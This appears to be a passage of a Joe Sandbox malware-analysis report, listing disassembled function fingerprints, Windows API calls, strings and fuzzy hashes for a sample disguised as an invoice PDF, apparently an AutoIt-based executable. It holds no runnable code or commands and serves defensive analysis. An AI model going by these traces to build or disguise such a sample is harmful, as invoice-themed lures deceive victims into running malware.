                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                              • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                              • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00414080
                                                                              • __freeptd.LIBCMT ref: 0041408A
                                                                              • ExitThread.KERNEL32 ref: 00414093
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3182216644-0
                                                                              • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                              • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: $8'I
                                                                              • API String ID: 2358735015-3608026889
                                                                              • Opcode ID: 7c79459be119e8ab83fd83d56cd9bb26aedb664f7f4d2fc6fd4fb24ee82e5e5a
                                                                              • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                              • Opcode Fuzzy Hash: 7c79459be119e8ab83fd83d56cd9bb26aedb664f7f4d2fc6fd4fb24ee82e5e5a
                                                                              • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3380330463-3941886329
                                                                              • Opcode ID: 65e96da6c00d3a9816727d17329223d4ff9c275a9c6027ede1643d43634922ce
                                                                              • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                              • Opcode Fuzzy Hash: 65e96da6c00d3a9816727d17329223d4ff9c275a9c6027ede1643d43634922ce
                                                                              • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH
                                                                              • API String ID: 1143807570-3662162768
                                                                              • Opcode ID: f9ef7675104e3210be752d84da8ad09db8f969464c8fbd0c377c96b83e5da954
                                                                              • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                              • Opcode Fuzzy Hash: f9ef7675104e3210be752d84da8ad09db8f969464c8fbd0c377c96b83e5da954
                                                                              • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH$HH
                                                                              • API String ID: 0-1787419579
                                                                              • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                              • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: a14379ceaf977ad6752c3e266529b50cd9e6196e106ff5e49418343571c800a5
                                                                              • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                              • Opcode Fuzzy Hash: a14379ceaf977ad6752c3e266529b50cd9e6196e106ff5e49418343571c800a5
                                                                              • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                              • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                              • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                              • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                              • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                              • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                              • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                              • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                              • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                              • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                              • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00474833
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                              • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                              • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                              • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                              • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                              • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                              • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                              • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                              • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                              • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InternetOpen
                                                                              • String ID: <local>
                                                                              • API String ID: 2038078732-4266983199
                                                                              • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                              • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                              • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                              • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                              • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                              • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                              • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
